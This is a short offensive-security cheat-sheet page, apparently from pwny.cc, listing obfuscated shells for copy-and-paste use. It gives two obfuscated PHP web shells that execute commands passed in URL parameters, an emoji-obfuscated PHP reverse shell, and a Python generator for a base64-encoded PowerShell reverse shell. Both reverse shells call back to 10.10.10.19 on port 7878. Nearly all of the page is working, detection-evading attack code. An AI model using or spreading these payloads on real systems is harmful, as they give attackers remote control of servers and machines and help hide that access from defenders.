pwny.cc
Search…
Obfuscated Shells

Web Shells

Obfuscated PHP

1
#Usage: http://target.com/path/to/shell.php?0=command
2
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
Copied!
1
#Usage: http://target.com/path/to/shell.php?_=function&__=argument
2
#Example: http://target.com/path/to/shell.php?_=system&__=ls
3
<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?> <?=${'_'.$_}["_"](${'_'.$_}["__"]);?>
Copied!

Reverse Shells

Emoji PHP

1
php -r '$πŸ˜€="1";$😁="2";$πŸ˜…="3";$πŸ˜†="4";$πŸ˜‰="5";$😊="6";$😎="7";$😍="8";$😚="9";$πŸ™‚="0";$🀒=" ";$πŸ€“="<";$🀠=">";$😱="-";$😡="&";$🀩="i";$πŸ€”=".";$🀨="/";$πŸ₯°="a";$😐="b";$😢="i";$πŸ™„="h";$πŸ˜‚="c";$🀣="d";$πŸ˜ƒ="e";$πŸ˜„="f";$πŸ˜‹="k";$😘="n";$πŸ˜—="o";$πŸ˜™="p";$πŸ€—="s";$πŸ˜‘="x";$πŸ’€ = $πŸ˜„. $πŸ€—. $πŸ˜—. $πŸ˜‚. $πŸ˜‹. $πŸ˜—. $πŸ˜™. $πŸ˜ƒ. $😘;$πŸš€ = "10.10.10.19";$πŸ’» = 7878;$🐚 = "sh". $🀒. $😱. $🀩. $🀒. $πŸ€“. $😡. $πŸ˜…. $🀒. $🀠. $😡. $πŸ˜…. $🀒. $😁. $🀠. $😡. $πŸ˜…;$🀣 = $πŸ’€($πŸš€,$πŸ’»);$πŸ‘½ = $πŸ˜ƒ. $πŸ˜‘. $πŸ˜ƒ. $πŸ˜‚;$πŸ‘½($🐚);'
Copied!

Powershell b64 encoded

1
#Execute in your linux to generate your Powershell Reverse Shell
2
python -c $'import base64; IP = "10.10.10.19"; PORT = "7878"; payload = \'$client = New-Object System.Net.Sockets.TCPClient("%s",%d);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\' % (IP, int(PORT)); print("powershell -e " + base64.b64encode(payload.encode("utf16")[2:]).decode());'
Copied!